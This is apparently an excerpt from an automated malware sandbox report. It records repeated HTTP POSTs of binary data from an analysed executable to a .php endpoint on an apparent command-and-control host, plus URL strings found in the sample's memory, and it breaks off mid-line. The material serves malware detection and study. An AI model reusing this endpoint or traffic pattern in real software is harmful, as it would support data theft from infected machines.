                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2544Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownDNS traffic detected: queries for: h172956.srv11.test-hf.su
                          Source: unknownHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: h172956.srv11.test-hf.suContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su/
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php
                          Source: hyperbrokerhostNetsvc.exe, 00000005.00000002.1918995355.000000000350E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 